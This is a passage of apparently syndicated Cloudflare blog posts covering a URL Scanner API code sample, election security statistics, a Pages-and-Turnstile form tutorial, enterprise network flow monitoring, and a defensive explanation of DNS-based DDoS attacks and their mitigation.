import { OpenAPIRoute, OpenAPIRouter, Uuid } from '@cloudflare/itty-router-openapi'

export class ScanMetadataCreate extends OpenAPIRoute {
  static schema = {
    tags: ['Scans'],
    summary: 'Create Scan metadata',
    requestBody: {
      scan_id: Uuid,
      url: z.string().url(),
      destination_ip: z.string().ip(),
      timestamp: z.string().datetime(),
      console_logs: [z.string()],
    },
  }

  async handle(
    request: Request,
    env: any,
    context: any,
    data: any,
  ) {
    // Retrieve validated scan
    const newScanMetadata = data.body

    // Insert the scan

    // Return scan as json
    return newScanMetadata
  }
}


const router = OpenAPIRouter()
router.post('/scan/metadata/', ScanMetadataCreate)

// 404 for everything else
router.all('*', () => new Response('Not Found.', { status: 404 }))

export default {
  fetch: router.handle,
}

In the example above, the ScanMetadataCreate endpoint will make sure to validate the incoming POST data to match the defined schema before calling the ‘async handle(request,env,context,data)’ function. This way you can be sure that if your code is called, the data argument will always be validated and formatted.

You can learn more about the project on its GitHub page.

Future plans and new features

Looking ahead, we’re committed to further elevating the URL Scanner’s capabilities. Key upcoming features include geographic scans, where users can customize the location that the scan is done from, providing critical insights into regional security threats and content compliance; expanded scan details, including more comprehensive headers and security details; and continuous performance improvements and optimisations, so we can deliver faster scan results.

The evolution of the URL Scanner is a reflection of our commitment to Internet safety and innovation. Whether you’re a developer, a security professional, or simply invested in the safety of the digital landscape, the URL Scanner API offers a comprehensive suite of tools to enhance your efforts. Explore the new features today, and join us in shaping a safer Internet for everyone.

Remember, while Security Center’s new capabilities offer advanced tools for URL Scanning for Cloudflare’s existing customers, the URL Scanner remains accessible for basic scans to the public on Cloudflare Radar, ensuring our technology benefits a broad audience.

If you’re considering a new career direction, check out our open positions. We’re looking for individuals who want to help make the Internet better; learn more about our mission here.

Cloudflare protects global democracy against threats from emerging technology during the 2024 voting season

Post Syndicated from Jocelyn Woolbright original https://blog.cloudflare.com/protecting-global-democracy-against-threats-from-emerging-technology


In 2024, more than 80 national elections are slated to occur, directly impacting approximately 4.2 billion individuals in places such as Indonesia, the United States, India, the European Union, and more. This marks the most extensive election cycle worldwide until the year 2048. Elections are a cornerstone of democracy, providing citizens with the means to shape their government, hold leaders accountable, and participate in the political process.

At Cloudflare, we’ve been supporting state and local governments that run elections for free for the last seven years. As we look at the upcoming elections around the world, we are reminded how important our services are in keeping information related to elections reliable and secure from those looking to disrupt these processes. Unfortunately, the problems that election officials face in keeping elections secure has only gotten more complicated and requires facilitating information sharing, capacity building, and joint efforts to safeguard democratic processes.

At Cloudflare, we support a range of players in the election space by providing security, performance, and reliability tools to help facilitate the democratic process. With Cloudflare Impact projects, we have found a way to protect a range of stakeholders who play an important role in the election process and better prepare them for the unexpected. As we have grown our various Impact projects to protect more than 2,900 domains, we have learned how best to protect vulnerable groups online.

During Security Week, we want to provide a look at how we are preparing groups that work in elections around the world for 2024, as well as exploring emerging threat trends.

A look at the year ahead

State and local governments play a critical role in various aspects of the election process. From voter registration to candidate filing, polling place setup, distribution of ballots, tabulations of voters, and reporting of election results, they ensure that elections are conducted fairly, securely, and efficiently.

If we have learned anything from the last seven years, it is that election officials have even more on their plate when it comes to conducting free and fair elections. Countries conducting elections this year are likely to face a complicated array of threats, from voter manipulation to physical violence. Unfortunately, in many countries, people have been blamed for election results that displeased certain politicians and constituents, and numerous election officials have encountered death threats, online harassment, and mistreatment. In April 2023, the Brennan Center found that 45% of local election officials said they fear for the safety of their colleagues.

When it comes to safeguarding online infrastructure, securing voter registration systems, ensuring the integrity of election-related information, and planning effective incident response are necessary as online threats grow more and more sophisticated. For example, in the three months leading up to the 2022 US midterm elections, Cloudflare prevented around 150,000 phishing emails targeting campaign officials.

How we use our services to promote free and fair elections

The core principle driving our work in the election space is the idea that access to accurate voting information, as provided by state and local governments, is fundamental to the proper functioning of democracy. We see ourselves as one piece of a larger puzzle when it comes to safeguarding elections.

Protecting election entities is an enormous task, and there is strength in partnerships that provide with a broad range of roles and expertise. We have seen groups such as the Cybersecurity and Infrastructure Security Agency increase their role in boosting election security efforts throughout the last few years. There have been partnerships between governments, organizations, and private companies assisting election officials with the tools and expertise on the best ways to secure the democratic process.

In 2020, we partnered with the International Foundation for Electoral Systems to find a way to expand our protections to election management bodies outside the United States. In our partnership, we have been able to provide our Enterprise-level services to six election management bodies, including the Central Election Commission of Kosovo, State Election Commission of North Macedonia, and many local election bodies in Canada.

“Cloudflare is a technology enabler for the State Election Committee (SEC) in North Macedonia, and its tools help us ensure that early election results will be accessible to the general population, thus promoting visibility and transparency.”
– Vladislav Bidikov, Cybersecurity Task Force Member, State Election Commission of North Macedonia        

Internet trends during elections

Looking at Internet trends during elections, we have seen in several countries that Internet traffic typically drops during the day, when people are going to the polling booths. That was the case in France and Brazil in 2022, for example. After the polling booths close, traffic usually increases, when citizens are looking for results — a spotlight also shared with the traditional TV channels.

Indonesia, a country with more than 200 million voters (and a population of 275 million) and over 17,000 islands, held general elections on Wednesday, February 14. On that day, daily traffic dropped 5% compared with the previous week. Hourly traffic during the day dropped as much as 15% between 08:00 and 13:00 local time (Western Indonesia time, where most of the population lives), when polling stations were open. Traffic was lower than in the previous week during that day, and only picked up on the following day.

On the other hand, mobile device usage was at its highest point of 2024 to date on February 14, representing 77% of all requests from the country.

Pakistan election day Internet outage

In Pakistan, general elections were held on February 8. During this time, our data shows an outage that started around 02:00 UTC, recovering after 15:00. The Internet shutdown targeted mobile networks and was criticized by Amnesty International.

The Telenor (AS24499), Jazz (AS45669), and Zong (AS59257) mobile networks were impacted. For example, here is a view of the Telenor network:

In addition, social media platform X experienced a national-scale disruption following protests ignited by allegations of vote rigging in the general elections. When it comes to Internet shutdowns, we see complete Internet blackouts represent the most severe type of Internet shutdowns, but limitations on the usage of social media and messaging applications, especially during elections, also pose large obstacles. Many of these platforms have become indispensable for journalists and the media, serving as an important channel to connect with audiences, share and publicize their content, and securely communicate with their sources.

How do you prepare for the unexpected?

We have detailed our work during many elections in the United States, including how we protected the 2020 elections during times of uncertainty. As we prepare for the 2024 election, we will continue collaborating with experts on how to best provide our services. Last year, we conducted an analysis on threats to election groups. Highlights include:

Early in 2024, we conducted webinars for state and local governments under the Athenian Project to identify configuration recommendations and provide lessons learned during the 2020 and 2022 midterms in the United States. We discussed topics such as preventing website defacement, and security checklist items such as checking domain and SSL certificate expiration dates. We are happy to report that many of these efforts in assisting state and local governments on configurations to make sure they are getting the most of our free Cloudflare products have been successful, with more than 92% of domains under the project using our proxy services to protect their website. But we still have a long way to go. We found that 2FA is still a problem, and we strongly encourage participants to enable it to protect accounts and sensitive information.

Ahead of the elections, we have also heard from larger election entities, such as secretaries of state, nonprofit organizations supporting election officials, and government agencies, who have reached out for our expertise on how to better support smaller election groups.

What keeps state and local election officials up at night?

To help prepare for the 2024 general elections in the United States, we wanted to learn more from state and local governments protected under the Athenian Project about what worries them in terms of online security threats. We sent out a brief survey to participants and found:

  • A majority of participants believe that the use of generative AI tools will have a significant impact on the 2024 election.
  • 80% of participants surveyed indicated that their team has experienced an email phishing attack in the last year.
  • Trust and reputation is the highest concern when it comes to a cyber attack with election operations as a close second.

We asked participants what they wished more people understood about their efforts in election security and reliability, and one county’s response stood out. To paraphrase, they said that election officials are also citizens and residents in their communities, and they strive to have safe, fair elections. We look forward to learning more about threats to these groups and how our products can help keep their internal data safe from attacks.

Super Tuesday

Because Super Tuesday in the United States involves several states, including California, Alabama, Iowa, North Carolina, and more, that hold their primaries or caucuses on the same day, it is often seen as a critical turning point in the presidential primary process.

On March 6, 2024, CISA reported there had been no credible digital threats to Super Tuesday, to the relief of many security experts. These comments came after Meta reported an outage that which caused Facebook, Messenger, and Instagram to be inaccessible to many users in the United States.

During Super Tuesday, we had the opportunity to witness firsthand the benefits of having access to free cybersecurity services to a range of elections groups. We are happy to report that during this time, we did not see any major cyberattacks against these groups. As part of this, we want to share updated insights into trends we have identified against election groups we protect to identify the types of attacks that they face with the hope of better securing them online.

Athenian Project

Under the Athenian Project, we protect more than 400 state and local government websites in 32 states that run elections. We identified 100 websites in the 16 states conducting elections on Super Tuesday and observed a considerable increase in traffic after Monday, March 4th.

When it comes to automated traffic to these websites, the figure below shows that we saw traffic classified as bot traffic maintain a relatively steady pattern between February 26 and March 5th. Bot traffic describes any non-human traffic to a website or an app, and it is important to note that not all bot traffic is malicious. Legitimate bot traffic includes activities like search engine indexing, while malicious bot traffic is designed to engage in fraudulent activities such as spamming, scraping content for unauthorized use, or launching distributed denial-of-service (DDoS) attacks.

As March 5th began, an increase in “human” traffic was clearly visible, with a significant increase starting at 05:00 EST and decreasing around 23:00. This is typical of what we see in the election space, as many people are visiting these websites to identify their polling place locations, or view up-to-date election results.

On Super Tuesday, Cloudflare mitigated over 18.9 million requests on March 5th, 2024, against state and local governments under the Athenian project.

Cloudflare for Campaigns

In 2020, we partnered with Defending Digital Campaigns, a nonprofit organization dedicated to providing cyber security resources and assistance to political campaigns and committees in the United States. Through our partnership, we have been able to provide more than $3 million in Cloudflare products. For this analysis, we identified 49 websites protected by Cloudflare for Campaigns that are located in the states that conducted an election during Super Tuesday. In total, we protect 97 campaign websites and 27 political party websites.

Overall traffic to these websites remained fairly consistent through the latter half of February and into March, but started to grow the weekend ahead of Super Tuesday, as seen in the figure below. Peaks were seen at 23:00 EST on March 4 and 20:00 EST on March 5.

We’ve noticed that these websites under Cloudflare for Campaign zones experience low, constant bot traffic, although it increased slightly during the first days of March. But the figure below shows that the overall increase in traffic discussed above was driven by a significant increase in request traffic identified as coming from actual users (that is, “human”).

A majority of the traffic was to political parties protected under the project in these Super Tuesday states, with 53% of the traffic identified going to these party websites.

Project Galileo

Cloudflare protects more than 65 Internet properties in the United States that work on a range of topics related to voting rights and promoting free and fair elections. Super Tuesday resulted in a considerable spike in traffic to these websites around 09:00 EST of 3.22M requests, which far surpassed the previous maximum value of 1.56M on February 20th at 11:00 EST, a 2x increase.

This spike was determined to be from user-driven traffic (not bot) and caused by a single zone related to a nonpartisan nonprofit organization that provides online voter guides for every state, including voter registration forms. The organization has been protected under Project Galileo since 2017. Their request traffic experienced a 1360% increase in traffic between 07:00 and 09:00 am EST. This is a clear example on the importance of access to cybersecurity tools in advance of a major event, as spikes in traffic can be unpredictable.

2024 and beyond

As we approach the 2024 election cycle, Cloudflare is ready to provide support to election officials, voting rights groups, political campaigns, and parties involved in elections.

With a year full of elections and given the global attention on election security, engagement of seasoned professionals with expertise is essential to safeguard the democratic process. Through continued collaboration with stakeholders in the election space, we continuously develop strategies for effectively securing web infrastructure and internal teams. Our commitment persists in safeguarding resources throughout the voting process and fostering trust in democratic institutions around the world.

We want to ensure that all groups working to promote democracy around the world have the tools they need to stay secure online. If you work in the election space and need our help, please apply at https://www.cloudflare.com/election-security.

Tune in for more news, announcements and thought-provoking discussions! Don’t miss the full Security Week hub page.

Building secure websites: a guide to Cloudflare Pages and Turnstile Plugin

Post Syndicated from Sally Lee original https://blog.cloudflare.com/guide-to-cloudflare-pages-and-turnstile-plugin


Balancing developer velocity and security against bots is a constant challenge. Deploying your changes as quickly and easily as possible is essential to stay ahead of your (or your customers’) needs and wants. Ensuring your website is safe from malicious bots — without degrading user experience with alien hieroglyphics to decipher just to prove that you are a human — is no small feat. With Pages and Turnstile, we’ll walk you through just how easy it is to have the best of both worlds!

Cloudflare Pages offer a seamless platform for deploying and scaling your websites with ease. You can get started right away with configuring your websites with a quick integration using your git provider, and get set up with unlimited requests, bandwidth, collaborators, and projects.

Cloudflare Turnstile is Cloudflare’s CAPTCHA alternative solution where your users don’t ever have to solve another puzzle to get to your website, no more stop lights and fire hydrants. You can protect your site without having to put your users through an annoying user experience. If you are already using another CAPTCHA service, we have made it easy for you to migrate over to Turnstile with minimal effort needed. Check out the Turnstile documentation to get started.

Alright, what are we building?

In this tutorial, we’ll walk you through integrating Cloudflare Pages with Turnstile to secure your website against bots. You’ll learn how to deploy Pages, embed the Turnstile widget, validate the token on the server side, and monitor Turnstile analytics. Let’s build upon this tutorial from Cloudflare’s developer docs, which outlines how to create an HTML form with Pages and Functions. We’ll also show you how to secure it by integrating with Turnstile, complete with client-side rendering and server-side validation, using the Turnstile Pages Plugin!

Step 1: Deploy your Pages

On the Cloudflare Dashboard, select your account and go to Workers & Pages to create a new Pages application with your git provider. Choose the repository where you cloned the tutorial project or any other repository that you want to use for this walkthrough.

The Build settings for this project is simple:

  • Framework preset: None
  • Build command: npm install @cloudflare/pages-plugin-turnstile
  • Build output directory: public

Once you select “Save and Deploy”, all the magic happens under the hood and voilà! The form is already deployed.

Step 2: Embed Turnstile widget

Now, let’s navigate to Turnstile and add the newly created Pages site.

Here are the widget configuration options:

  • Domain: All you need to do is add the domain for the Pages application. In this example, it’s “pages-turnstile-demo.pages.dev”. For each deployment, Pages generates a deployment specific preview subdomain. Turnstile covers all subdomains automatically, so your Turnstile widget will work as expected even in your previews. This is covered more extensively in our Turnstile domain management documentation.
  • Widget Mode: There are three types of widget modes you can choose from.
  • Managed: This is the recommended option where Cloudflare will decide when further validation through the checkbox interaction is required to confirm whether the user is a human or a bot. This is the mode we will be using in this tutorial.
  • Non-interactive: This mode does not require the user to interact and check the box of the widget. It is a non-intrusive mode where the widget is still visible to users but requires no added step in the user experience.
  • Invisible: Invisible mode is where the widget is not visible at all to users and runs in the background of your website.
  • Pre-Clearance setting: With a clearance cookie issued by the Turnstile widget, you can configure your website to verify every single request or once within a session. To learn more about implementing pre-clearance, check out this blog post.

Once you create your widget, you will be given a sitekey and a secret key. The sitekey is public and used to invoke the Turnstile widget on your site. The secret key should be stored safely for security purposes.

Let’s embed the widget above the Submit button. Your index.html should look like this:

<!doctype html>
<html lang="en">
	<head>
		<meta charset="utf8">
		<title>Cloudflare Pages | Form Demo</title>
		<meta name="theme-color" content="#d86300">
		<meta name="mobile-web-app-capable" content="yes">
		<meta name="apple-mobile-web-app-capable" content="yes">
		<meta name="viewport" content="width=device-width,initial-scale=1">
		<link rel="icon" type="image/png" href="https://www.cloudflare.com/favicon-128.png">
		<link rel="stylesheet" href="/index.css">
		<script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=_turnstileCb" defer></script>
	</head>
	<body>

		<main>
			<h1>Demo: Form Submission</h1>

			<blockquote>
				<p>This is a demonstration of Cloudflare Pages with Turnstile.</p>
				<p>Pages deployed a <code>/public</code> directory, containing a HTML document (this webpage) and a <code>/functions</code> directory, which contains the Cloudflare Workers code for the API endpoint this <code>&lt;form&gt;</code> references.</p>
				<p><b>NOTE:</b> On form submission, the API endpoint responds with a JSON representation of the data. There is no JavaScript running in this example.</p>
			</blockquote>

			<form method="POST" action="/api/submit">
				<div class="input">
					<label for="name">Full Name</label>
					<input id="name" name="name" type="text" />
				</div>

				<div class="input">
					<label for="email">Email Address</label>
					<input id="email" name="email" type="email" />
				</div>

				<div class="input">
					<label for="referers">How did you hear about us?</label>
					<select id="referers" name="referers">
						<option hidden disabled selected value></option>
						<option value="Facebook">Facebook</option>
						<option value="Twitter">Twitter</option>
						<option value="Google">Google</option>
						<option value="Bing">Bing</option>
						<option value="Friends">Friends</option>
					</select>
				</div>

				<div class="checklist">
					<label>What are your favorite movies?</label>
					<ul>
						<li>
							<input id="m1" type="checkbox" name="movies" value="Space Jam" />
							<label for="m1">Space Jam</label>
						</li>
						<li>
							<input id="m2" type="checkbox" name="movies" value="Little Rascals" />
							<label for="m2">Little Rascals</label>
						</li>
						<li>
							<input id="m3" type="checkbox" name="movies" value="Frozen" />
							<label for="m3">Frozen</label>
						</li>
						<li>
							<input id="m4" type="checkbox" name="movies" value="Home Alone" />
							<label for="m4">Home Alone</label>
						</li>
					</ul>
				</div>
				<div id="turnstile-widget" style="padding-top: 20px;"></div>
				<button type="submit">Submit</button>
			</form>
		</main>
	<script>
	// This function is called when the Turnstile script is loaded and ready to be used.
	// The function name matches the "onload=..." parameter.
	function _turnstileCb() {
	    console.debug('_turnstileCb called');

	    turnstile.render('#turnstile-widget', {
	      sitekey: '0xAAAAAAAAAXAAAAAAAAAAAA',
	      theme: 'light',
	    });
	}
	</script>
	</body>
</html>

You can embed the Turnstile widget implicitly or explicitly. In this tutorial, we will explicitly embed the widget by injecting the JavaScript tag and related code, then specifying the placement of the widget.

<script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=_turnstileCb" defer></script>
<script>
	function _turnstileCb() {
	    console.debug('_turnstileCb called');

	    turnstile.render('#turnstile-widget', {
	      sitekey: '0xAAAAAAAAAXAAAAAAAAAAAA',
	      theme: 'light',
	    });
	}
</script>

Make sure that the div id you assign is the same as the id you specify in turnstile.render call. In this case, let’s use “turnstile-widget”. Once that’s done, you should see the widget show up on your site!

<div id="turnstile-widget" style="padding-top: 20px;"></div>

Step 3: Validate the token

Now that the Turnstile widget is rendered on the front end, let’s validate it on the server side and check out the Turnstile outcome. We need to make a call to the /siteverify API with the token in the submit function under ./functions/api/submit.js.

First, grab the token issued from Turnstile under cf-turnstile-response. Then, call the /siteverify API to ensure that the token is valid. In this tutorial, we’ll attach the Turnstile outcome to the response to verify everything is working well. You can decide on the expected behavior and where to direct the user based on the /siteverify response.

/**
 * POST /api/submit
 */

import turnstilePlugin from "@cloudflare/pages-plugin-turnstile";

// This is a demo secret key. In prod, we recommend you store
// your secret key(s) safely. 
const SECRET_KEY = '0x4AAAAAAASh4E5cwHGsTTePnwcPbnFru6Y';

export const onRequestPost = [
    turnstilePlugin({
    	secret: SECRET_KEY,
    }),
    (async (context) => {
    	// Request has been validated as coming from a human
    	const formData = await context.request.formData()

    	var tmp, outcome = {};
	for (let [key, value] of formData) {
		tmp = outcome[key];
		if (tmp === undefined) {
			outcome[key] = value;
		} else {
			outcome[key] = [].concat(tmp, value);
		}
	}

	// Attach Turnstile outcome to the response
	outcome["turnstile_outcome"] = context.data.turnstile;

	let pretty = JSON.stringify(outcome, null, 2);

      	return new Response(pretty, {
      		headers: {
      			'Content-Type': 'application/json;charset=utf-8'
      		}
      	});
    })
];

Since Turnstile accurately decided that the visitor was not a bot, the response for “success” is “true” and “interactive” is “false”. The “interactive” being “false” means that the checkbox was automatically checked by Cloudflare as the visitor was determined to be human. The user was seamlessly allowed access to the website without having to perform any additional actions. If the visitor looks suspicious, Turnstile will become interactive, requiring the visitor to actually click the checkbox to verify that they are not a bot. We used the managed mode in this tutorial but depending on your application logic, you can choose the widget mode that works best for you.

{
  "name": "Sally Lee",
  "email": "[email protected]",
  "referers": "Facebook",
  "movies": "Space Jam",
  "cf-turnstile-response": "0._OHpi7JVN7Xz4abJHo9xnK9JNlxKljOp51vKTjoOi6NR4ru_4MLWgmxt1rf75VxRO4_aesvBvYj8bgGxPyEttR1K2qbUdOiONJUd5HzgYEaD_x8fPYVU6uZPUCdWpM4FTFcxPAnqhTGBVdYshMEycXCVBqqLVdwSvY7Me-VJoge7QOStLOtGgQ9FaY4NVQK782mpPfgVujriDAEl4s5HSuVXmoladQlhQEK21KkWtA1B6603wQjlLkog9WqQc0_3QMiBZzZVnFsvh_NLDtOXykOFK2cba1mLLcADIZyhAho0mtmVD6YJFPd-q9iQFRCMmT2Sz00IToXz8cXBGYluKtxjJrq7uXsRrI5pUUThKgGKoHCGTd_ufuLDjDCUE367h5DhJkeMD9UsvQgr1MhH3TPUKP9coLVQxFY89X9t8RAhnzCLNeCRvj2g-GNVs4-MUYPomd9NOcEmSpklYwCgLQ.jyBeKkV_MS2YkK0ZRjUkMg.6845886eb30b58f15de056eeca6afab8110e3123aeb1c0d1abef21c4dd4a54a1",
  "turnstile_outcome": {
    "success": true,
    "error-codes": [],
    "challenge_ts": "2024-02-28T22:52:30.009Z",
    "hostname": "pages-turnstile-demo.pages.dev",
    "action": "",
    "cdata": "",
    "metadata": {
      "interactive": false
    }
  }
}

Wrapping up

Now that we’ve set up Turnstile, we can head to Turnstile analytics in the Cloudflare Dashboard to monitor the solve rate and widget traffic. Visitor Solve Rate indicates the percentage of visitors who successfully completed the Turnstile widget. A sudden drop in the Visitor Solve Rate could indicate an increase in bot traffic, as bots may fail to complete the challenge presented by the widget. API Solve Rate measures the percentage of visitors who successfully validated their token against the /siteverify API. Similar to the Visitor Solve Rate, a significant drop in the API Solve Rate may indicate an increase in bot activity, as bots may fail to validate their tokens. Widget Traffic provides insights into the nature of the traffic hitting your website. A high number of challenges requiring interaction may suggest that bots are attempting to access your site, while a high number of unsolved challenges could indicate that the Turnstile widget is effectively blocking suspicious traffic.

And that’s it! We’ve walked you through how to easily secure your Pages with Turnstile. Pages and Turnstile are currently available for free for every Cloudflare user to get started right away. If you are looking for a seamless and speedy developer experience to get a secure website up and running, protected by Turnstile, head over to the Cloudflare Dashboard today!

Free network flow monitoring for all enterprise customers

Post Syndicated from Chris Draper original https://blog.cloudflare.com/free-network-monitoring-for-enterprise


A key component of effective corporate network security is establishing end to end visibility across all traffic that flows through the network. Every network engineer needs a complete overview of their network traffic to confirm their security policies work, to identify new vulnerabilities, and to analyze any shifts in traffic behavior. Often, it’s difficult to build out effective network monitoring as teams struggle with problems like configuring and tuning data collection, managing storage costs, and analyzing traffic across multiple visibility tools.

Today, we’re excited to announce that a free version of Cloudflare’s network flow monitoring product, Magic Network Monitoring, is available to all Enterprise Customers. Every Enterprise Customer can configure Magic Network Monitoring and immediately improve their network visibility in as little as 30 minutes via our self-serve onboarding process.

Enterprise Customers can visit the Magic Network Monitoring product page, click “Talk to an expert”, and fill out the form. You’ll receive access within 24 hours of submitting the request. Over the next month, the free version of Magic Network Monitoring will be rolled out to all Enterprise Customers. The product will automatically be available by default without the need to submit a form.

How it works

Cloudflare customers can send their network flow data (either NetFlow or sFlow) from their routers to Cloudflare’s network edge.

Magic Network Monitoring will pick up this data, parse it, and instantly provide insights and analytics on your network traffic. These analytics include traffic volume overtime in bytes and packets, top protocols, sources, destinations, ports, and TCP flags.

Dogfooding Magic Network Monitoring during the remediation of the Thanksgiving 2023 security incident

Let’s review a recent example of how Magic Network Monitoring improved Cloudflare’s own network security and traffic visibility during the Thanksgiving 2023 security incident. Our security team needed a lightweight method to identify malicious packet characteristics in our core data center traffic. We monitored for any network traffic sourced from or destined to a list of ASNs associated with the bad actor. Our security team setup Magic Network Monitoring and established visibility into our first core data center within 24 hours of the project kick-off. Today, Cloudflare continues to use Magic Network Monitoring to monitor for traffic related to bad actors and to provide real time traffic analytics on more than 1 Tbps of core data center traffic.

Magic Network Monitoring – Traffic Analytics

Monitoring local network traffic from IoT devices

Magic Network Monitoring also improves visibility on any network traffic that doesn’t go through Cloudflare. Imagine that you’re a network engineer at ACME Corporation, and it’s your job to manage and troubleshoot IoT devices in a factory that are connected to the factory’s internal network. The traffic generated by these IoT devices doesn’t go through Cloudflare because it is destined to other devices and endpoints on the internal network. Nonetheless, you still need to establish network visibility into device traffic over time to monitor and troubleshoot the system.

To solve the problem, you configure a router or other network device to securely send encrypted traffic flow summaries to Cloudflare via an IPSec tunnel. Magic Network Monitoring parses the data, and instantly provides you with insights and analytics on your network traffic. Now, when an IoT device goes down, or a connection between IoT devices is unexpectedly blocked, you can analyze historical network traffic data in Magic Network Monitoring to speed up the troubleshooting process.

Monitoring cloud network traffic

As cloud networking becomes increasingly prevalent, it is essential for enterprises to invest in visibility across their cloud environments. Let’s say you’re responsible for monitoring and troubleshooting your corporation’s cloud network operations which are spread across multiple public cloud providers. You need to improve visibility into your cloud network traffic to analyze and troubleshoot any unexpected traffic patterns like configuration drift that leads to an exposed network port.

To improve traffic visibility across different cloud environments, you can export cloud traffic flow logs from any virtual device that supports NetFlow or sFlow to Cloudflare. In the future, we are building support for native cloud VPC flow logs in conjunction with Magic Cloud Networking. Cloudflare will parse this traffic flow data and provide alerts plus analytics across all your cloud environments in a single pane of glass on the Cloudflare dashboard.

Improve your security posture today in less than 30 minutes

If you’re an existing Enterprise customer, and you want to improve your corporate network security, you can get started right away. Visit the Magic Network Monitoring product page, click “Talk to an expert”, and fill out the form. You’ll receive access within 24 hours of submitting the request. You can begin the self-serve onboarding tutorial, and start monitoring your first batch of network traffic in less than 30 minutes.

Over the next month, the free version of Magic Network Monitoring will be rolled out to all Enterprise Customers. The product will be automatically available by default without the need to submit a form.

If you’re interested in becoming an Enterprise Customer, and have more questions about Magic Network Monitoring, you can talk with an expert. If you’re a free customer, and you’re interested in testing a limited beta of Magic Network Monitoring, you can fill out this form to request access.

Advanced DNS Protection: mitigating sophisticated DNS DDoS attacks

Post Syndicated from Omer Yoachimik original https://blog.cloudflare.com/advanced-dns-protection


We’re proud to introduce the Advanced DNS Protection system, a robust defense mechanism designed to protect against the most sophisticated DNS-based DDoS attacks. This system is engineered to provide top-tier security, ensuring your digital infrastructure remains resilient in the face of evolving threats.

Our existing systems have been successfully detecting and mitigating ‘simpler’ DDoS attacks against DNS, but they’ve struggled with the more complex ones. The Advanced DNS Protection system is able to bridge that gap by leveraging new techniques that we will showcase in this blog post.

Advanced DNS Protection is currently in beta and available for all Magic Transit customers at no additional cost. Read on to learn more about DNS DDoS attacks, how the new system works, and what new functionality is expected down the road.

Register your interest to learn more about how we can help keep your DNS servers protected, available, and performant.

A third of all DDoS attacks target DNS servers

Distributed Denial of Service (DDoS) attacks are a type of cyber attack that aim to disrupt and take down websites and other online services. When DDoS attacks succeed and websites are taken offline, it can lead to significant revenue loss and damage to reputation.

Distribution of DDoS attack types for 2023

One common way to disrupt and take down a website is to flood its servers with more traffic than it can handle. This is known as an HTTP flood attack. It is a type of DDoS attack that targets the website directly with a lot of HTTP requests. According to our last DDoS trends report, in 2023 our systems automatically mitigated 5.2 million HTTP DDoS attacks — accounting for 37% of all DDoS attacks.

Diagram of an HTTP flood attack

However, there is another way to take down websites: by targeting them indirectly. Instead of flooding the website servers, the threat actor floods the DNS servers. If the DNS servers are overwhelmed with more queries than their capacity, hostname to IP address translation fails and the website experiences an indirectly inflicted outage because the DNS server cannot respond to legitimate queries.

One notable example is the attack that targeted Dyn, a DNS provider, in October 2016. It was a devastating DDoS attack launched by the infamous Mirai botnet. It caused disruptions for major sites like Airbnb, Netflix, and Amazon, and it took Dyn an entire day to restore services. That’s a long time for service disruptions that can lead to significant reputation and revenue impact.

Over seven years later, Mirai attacks and DNS attacks are still incredibly common. In 2023, DNS attacks were the second most common attack type — with a 33% share of all DDoS attacks (4.6 million attacks). Attacks launched by Mirai-variant botnets were the fifth most common type of network-layer DDoS attack, accounting for 3% of all network-layer DDoS attacks.

Diagram of a DNS query flood attack

What are sophisticated DNS-based DDoS attacks?

DNS-based DDoS attacks can be easier to mitigate when there is a recurring pattern in each query. This is what’s called the “attack fingerprint”. Fingerprint-based mitigation systems can identify those patterns and then deploy a mitigation rule that surgically filters the attack traffic without impacting legitimate traffic.

For example, let’s take a scenario where an attacker sends a flood of DNS queries to their target. In this example, the attacker only randomized the source IP address. All other query fields remained consistent. The mitigation system detected the pattern (source port is 1024 and the queried domain is example.com) and will generate an ephemeral mitigation rule to filter those queries.

A simplified diagram of the attack fingerprinting concept

However, there are DNS-based DDoS attacks that are much more sophisticated and randomized, lacking an apparent attack pattern. Without a consistent pattern to lock on to, it becomes virtually impossible to mitigate the attack using a fingerprint-based mitigation system. Moreover, even if an attack pattern is detected in a highly randomized attack, the pattern would probably be so generic that it would mistakenly mitigate legitimate user traffic and/or not catch the entire attack.

In this example, the attacker also randomized the queried domain in their DNS query flood attack. Simultaneously, a legitimate client (or server) is also querying example.com. They were assigned a random port number which happened to be 1024. The mitigation system detected a pattern (source port is 1024 and the queried domain is example.com) that caught only the part of the attack that matched the fingerprint. The mitigation system missed the part of the attack that queried other hostnames. Lastly, the mitigation system mistakenly caught legitimate traffic that happened to appear similar to the attack traffic.

A simplified diagram of a randomized DNS flood attack

This is just one very simple example of how fingerprinting can fail in stopping randomized DDoS attacks. This challenge is amplified when attackers “launder” their attack traffic through reputable public DNS resolvers (a DNS resolver, also known as a recursive DNS server, is a type of DNS server that is responsible for tracking down the IP address of a website from various other DNS servers). This is known as a DNS laundering attack.

Diagram of the DNS resolution process

During a DNS laundering attack, the attacker queries subdomains of a real domain that is managed by the victim’s authoritative DNS server. The prefix that defines the subdomain is randomized and is never used more than once. Due to the randomization element, recursive DNS servers will never have a cached response and will need to forward the query to the victim’s authoritative DNS server. The authoritative DNS server is then bombarded by so many queries until it cannot serve legitimate queries or even crashes altogether.

Diagram of a DNS Laundering attack

The complexity of sophisticated DNS DDoS attacks lies in their paradoxical nature: while they are relatively easy to detect, effectively mitigating them is significantly more difficult. This difficulty stems from the fact that authoritative DNS servers cannot simply block queries from recursive DNS servers, as these servers also make legitimate requests. Moreover, the authoritative DNS server is unable to filter queries aimed at the targeted domain because it is a genuine domain that needs to remain accessible.

Mitigating sophisticated DNS-based DDoS attacks with the Advanced DNS Protection system

The rise in these types of sophisticated DNS-based DDoS attacks motivated us to develop a new solution — a solution that would better protect our customers and bridge the gap of more traditional fingerprinting approaches. This solution came to be the Advanced DNS Protection system. Similar to the Advanced TCP Protection system, it is a software-defined system that we built, and it is powered by our stateful mitigation platform, flowtrackd (flow tracking daemon).

The Advanced DNS Protection system complements our existing suite of DDoS defense systems. Following the same approach as our other DDoS defense systems, the Advanced DNS Protection system is also a distributed system, and an instance of it runs on every Cloudflare server around the world. Once the system has been initiated, each instance can detect and mitigate attacks autonomously without requiring any centralized regulation. Detection and mitigation is instantaneous (zero seconds). Each instance also communicates with other instances on other servers in a data center. They gossip and share threat intelligence to deliver a comprehensive mitigation within each data center.

Screenshots from the Cloudflare dashboard showcasing a DNS-based DDoS attack that was mitigated by the Advanced DNS Protection system 

Together, our fingerprinting-based systems (the DDoS protection managed rulesets) and our stateful mitigation systems provide a robust multi-layered defense strategy to defend against the most sophisticated and randomized DNS-based DDoS attacks. The system is also customizable, allowing Cloudflare customers to tailor it for their needs. Review our documentation for more information on configuration options.

